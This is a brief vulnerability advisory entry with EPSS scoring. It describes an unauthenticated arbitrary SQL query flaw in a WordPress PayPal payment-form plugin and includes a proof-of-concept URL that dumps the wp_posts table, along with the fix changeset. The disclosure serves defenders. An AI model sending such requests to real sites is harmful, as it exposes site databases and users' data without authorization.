0.68 Medium
EPSS
Percentile
98.0%
The ‘query’ parameter allowed for any unauthenticated user to perform SQL queries with result output to a web page in JSON format.
https://example.com/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_posts
plugins.trac.wordpress.org/changeset/2323857/payment-form-for-paypal-pro